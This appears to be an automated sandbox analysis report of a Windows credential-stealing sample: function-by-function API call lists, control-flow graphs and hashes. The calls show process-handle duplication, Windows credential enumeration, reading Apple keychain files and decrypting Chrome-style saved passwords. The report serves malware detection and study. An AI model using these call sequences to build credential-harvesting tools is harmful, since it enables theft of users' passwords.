GetPrivateProfileIntW 40311->40313 40316 4143f1 memset _itow WritePrivateProfileStringW 40312->40316 40313->40310 40315 41457a 40315->40310 40316->40315

                                                  Executed Functions

                                                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                  APIs
                                                  • memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                  • memset.MSVCRT ref: 0040DF5F
                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                  • API String ID: 594330280-3398334509
                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                  Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 FindCloseChangeNotification 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                  • memset.MSVCRT ref: 00413D7F
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                  • memset.MSVCRT ref: 00413E07
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                  • API String ID: 2191996607-1740548384
                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                  • memcpy.MSVCRT ref: 0040B60D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                  • String ID: BIN
                                                  • API String ID: 1668488027-1015027815
                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFind$FirstNext
                                                  • String ID:
                                                  • API String ID: 1690352074-0
                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0041898C
                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InfoSystemmemset
                                                  • String ID:
                                                  • API String ID: 3558857096-0
                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                  APIs
                                                  • memset.MSVCRT ref: 004455C2
                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 0044570D
                                                  • memset.MSVCRT ref: 00445725
                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  • memset.MSVCRT ref: 0044573D
                                                  • memset.MSVCRT ref: 00445755
                                                  • memset.MSVCRT ref: 004458CB
                                                  • memset.MSVCRT ref: 004458E3
                                                  • memset.MSVCRT ref: 0044596E
                                                  • memset.MSVCRT ref: 00445A10
                                                  • memset.MSVCRT ref: 00445A28
                                                  • memset.MSVCRT ref: 00445AC6
                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  • memset.MSVCRT ref: 00445B52
                                                  • memset.MSVCRT ref: 00445B6A
                                                  • memset.MSVCRT ref: 00445C9B
                                                  • memset.MSVCRT ref: 00445CB3
                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                  • memset.MSVCRT ref: 00445B82
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                  • memset.MSVCRT ref: 00445986
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                  • API String ID: 2745753283-3798722523
                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                  Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                  • String ID: $/deleteregkey$/savelangfile
                                                  • API String ID: 2744995895-28296030
                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                  Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                  • memset.MSVCRT ref: 0040B756
                                                  • memset.MSVCRT ref: 0040B7F5
                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                  • memset.MSVCRT ref: 0040B851
                                                  • memset.MSVCRT ref: 0040B8CA
                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                  • memset.MSVCRT ref: 0040BB53
                                                  • memcpy.MSVCRT ref: 0040BB66
                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                  • String ID: chp$v10
                                                  • API String ID: 170802307-2783969131
                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                  • String ID:
                                                  • API String ID: 3715365532-3916222277
                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
